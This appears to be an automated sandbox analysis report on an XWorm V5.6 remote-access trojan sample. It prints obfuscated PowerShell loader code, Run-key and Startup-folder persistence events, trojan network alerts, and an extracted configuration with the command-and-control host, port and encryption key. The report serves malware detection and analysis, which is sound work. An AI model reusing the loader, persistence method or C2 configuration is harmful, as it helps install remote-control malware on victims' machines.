','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u
                      Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\x4usb.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x4host.exe, ProcessId: 6860, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\x4usb
                      Source: File createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x4host.exe, ProcessId: 6860, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x4usb.lnk
                      Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: C:\Windows\System32\dllhost.exe /Processid:{ae1c0bda-3b65-4ccd-a1ee-0c799d56cbd6}, ParentImage: C:\Windows\System32\dllhost.exe, ParentProcessId: 2852, ParentProcessName: dllhost.exe, ProcessCommandLine: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM, ProcessId: 920, ProcessName: svchost.exe
                      Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:rLleiAFHAZAE{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$OsygfxRUYuIQnc,[Parameter(Position=1)][Type]$MbVaDjEwaI)$reLCkliZwnS=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+''+'f'+'l'+[Char](101)+''+[Char](99)+''+'t'+''+[Char](101)+''+[Char](100)+''+'D'+'e'+[Char](108)+''+'e'+''+[Char](103)+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+'y'+'M'+'o'+[Char](100)+''+[Char](117)+'l'+'e'+'',$False).DefineType('My'+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+'ate'+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+'s'+','+''+[Char](80)+''+'u'+'bl'+'i'+''+[Char](99)+''+[Char](44)+''+[Char](83)+''+[Char](101)+'a'+[Char](108)+''+[Char](101)+''+'d'+','+'A'+''+[Char](110)+''+[Char](115)+''+[Char](105)+''+[Char](67)+'la'+[Char](115)+''+'s'+','+[Char](65)+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+''+[Char](108)+'a'+[Char](115)+'s',[MulticastDelegate]);$reLCkliZwnS.DefineConstructor(''+[Char](82)+''+'T'+'S'+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+'l'+[Char](78)+''+'a'+''+[Char](109)+'e'+[Char](44)+''+[Char](72)+''+'i'+'deByS'+'i'+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+'b'+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+',M'+[Char](97)+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+'d'+'');$reLCkliZwnS.DefineMethod(''+[Char](73)+''+[Char](110)+'v'+'o'+''+'k'+''+[Char](101)+'',''+[Char](80)+''+'u'+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](72)+''+[Char](105)+'deB'+'y'+''+'S'+'i'+[Char](103)+','+'N'+'ew'+[Char](83)+''+[Char](108)+'o'+[Char](116)+''+','+'Vi'+[Char](114)+'t'+[Char](117)+''+[Char](97)+''+'l'+'',$MbVaDjEwaI,$OsygfxRUYuIQnc).SetImplementationFlags(''+'R'+''+'u'+''+'n'+''+'t'+''+'i'+'me'+[Char](44)+''+'M'+''+[Char](97)+''+'n'+''+[Char](97)+'g'+[Char](101)+''+'d'+'');Write-Output $reLCkliZwnS.CreateType();}$GGVrSjgYYZyVF=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('Sy'+[Char](115)+''+[Char](116)+''+'e'+'m.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+[Char](111)+''+[Char](115)+''+[Char](111)+''+'f'+'t.Wi'+[Char](110)+'32.'+'U'+''+[Char](110)+''+'s'+'a'+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+'eth'+'o'+''+[Char](100)+''+'s'+'');$VrBFKSFCQkTmpL=$GGVrSjgYYZyVF.GetMethod(''+'G'+''+[Char](101)+'tPr'+[Char](111)+''+[Char](99)+''+[Char](65)+''+[Char](100)+'d'+[Char](114)+''+[Char](101)+'s'+'s'+'',[Reflection.BindingFlags](''+[Char](80)+'u
                      Timestamp:07/02/24-00:31:31.600432
                      SID:2855924
                      Source Port:49731
                      Destination Port:36125
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-00:31:12.392608
                      SID:2853191
                      Source Port:36125
                      Destination Port:49731
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-00:31:15.100229
                      SID:2852923
                      Source Port:49732
                      Destination Port:36125
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-00:31:12.013436
                      SID:2853192
                      Source Port:49731
                      Destination Port:36125
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-00:33:13.525735
                      SID:2852870
                      Source Port:36125
                      Destination Port:49731
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-00:31:15.100229
                      SID:2852873
                      Source Port:49732
                      Destination Port:36125
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-00:32:52.687393
                      SID:2852874
                      Source Port:36125
                      Destination Port:49731
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-00:33:13.526536
                      SID:2852923
                      Source Port:49731
                      Destination Port:36125
                      Protocol:TCP
                      Classtype:A Network Trojan was detected
                      Timestamp:07/02/24-00:31:15.149071
                      SID:2852870
                      Source Port:36125
                      Destination Port:49732
                      Protocol:TCP
                      Classtype:A Network Trojan was detected

                      Click to jump to signature section

                      Show All Signature Results

                      AV Detection

                      barindex
                      Source: x433.exeAvira: detected
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeAvira: detection malicious, Label: TR/Dropper.MSIL.Gen
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: C:\Users\user\AppData\Local\x4usb.exeAvira: detection malicious, Label: HEUR/AGEN.1305769
                      Source: 00000000.00000002.1709422465.0000000002991000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["session-chief.gl.at.ply.gg"], "Port": "36125", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeReversingLabs: Detection: 95%
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeReversingLabs: Detection: 91%
                      Source: C:\Users\user\AppData\Local\x4usb.exeReversingLabs: Detection: 91%
                      Source: x433.exeReversingLabs: Detection: 76%
                      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\Temp\x4host.exeJoe Sandbox ML: detected
                      Source: C:\Users\user\AppData\Local\x4usb.exeJoe Sandbox ML: detected
                      Source: x433.exeJoe Sandbox ML: detected
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpackString decryptor: session-chief.gl.at.ply.gg
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpackString decryptor: 36125
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpackString decryptor: <123456789>
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpackString decryptor: <Xwormmm>
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpackString decryptor: XWorm V5.6
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpackString decryptor: USB.exe
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpackString decryptor: %LocalAppData%
                      Source: 0.2.x433.exe.29b77d8.1.raw.unpackString decryptor: x4usb.exe
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeCode function: 1_2_00401000 CryptAcquireContextW,CryptGenRandom,CryptReleaseContext,1_2_00401000
                      Source: x433.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: x433.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: .@\??\C:\Users\user\AppData\Local\Temp\wctAB5F.tmp.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: (@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2 source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2.pdbr source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: WINLOA~1.PDB source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\ntkrnlmp.pdb source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\wct3D66.tmp.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: *@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb* source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: "@\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831 source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\68A17FAF3012B7846079AEECDBE0A5831\download.error source: svchost.exe, 0000000F.00000000.1792926798.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2949912235.000001ADEC02B000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ,@\??\C:\Users\user\AppData\Local\Temp\wmsetup.log.pdb source: svchost.exe, 0000000F.00000000.1792989372.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2951597581.000001ADEC042000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: @\??\C:\Users\user\AppData\Local\Temp\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: svchost.exe, 0000000F.00000000.1793027945.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp, svchost.exe, 0000000F.00000002.2952676852.000001ADEC05C000.00000004.00000001.00020000.00000000.sdmp
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandlerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServerJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ElevationJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAsJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\x4Shellcode.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32Jump to behavior
